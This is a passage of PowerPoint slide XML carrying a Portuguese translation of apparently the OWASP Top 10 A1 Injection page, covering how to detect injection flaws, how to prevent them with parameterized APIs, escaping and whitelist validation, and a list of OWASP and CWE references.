                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verificar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o código é uma forma rápida e precisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de identificar se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a aplicação utiliza os interpretadores seguramente. Ferramentas de análise de código podem ajudar o analista de segurança a encontrar o uso dos interpretadores e traçar o fluxo de dados através da aplicação. Testes de invasão podem validar estas questões </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>através da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elaboração de exploits que confirmam a vulnerabilidade. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Varredura dinâmica automatizada que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exercite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a aplicação pode fornecer uma visão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>caso exista alguma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>falha explorável de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injeção. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaneadores nem sempre podem alcançar os interpretadores e tem dificuldade em detectar se um ataque foi bem sucedido. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tratamento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de erros </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fraco torna as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>falhas de injeção </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fáceis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de descobrir.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475038" y="6444208"/>
            <a:ext cx="3382962" cy="2699792"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP SQL Injection Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Query Parameterization Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Command Injection Article</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP XML eXternal Entity (XXE) Reference Article</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS: Output Encoding/Escaping Requirements (V6)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on SQL Injection Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE Entry 77 on Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE Entry 89 on SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE Entry 564 on Hibernate Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475038" y="3707904"/>
            <a:ext cx="3382962" cy="2664296"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>faço para evitar?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevenção de injeção requer manter os dados não confiáveis separados dos comandos e consultas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>opção preferida é utilizar uma API segura que evite o uso do interpretador inteiramente ou forneça uma interface parametrizada. Seja cuidadoso com APIs, assim como  procedimentos armazenados, que são parametrizados, mas podem ainda introduzir injeção por debaixo dos panos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se uma API parametrizada não estiver disponível, você deve cuidadosamente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filtrar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>os caracteres especiais utilizando a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sintaxe para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esse interpretador. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP’s ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fornece muitas dessas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>rotinas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>filtragem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Lista branca" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou validação de entrada positiva também é recomendada, mas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>não</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> é uma defesa completa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>já que muitas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aplicações requerem caracteres especiais em suas entradas. Se os caracteres especiais </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>são exigidos, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>somente as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abordagens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. e 2.  acima </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tornarão a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sua utilização segura. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP’s ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tem uma extensa biblioteca de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t> rotinas de validação de entradas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>por lista branca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 35"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>A1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76200"/>
            <a:ext cx="5486400" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
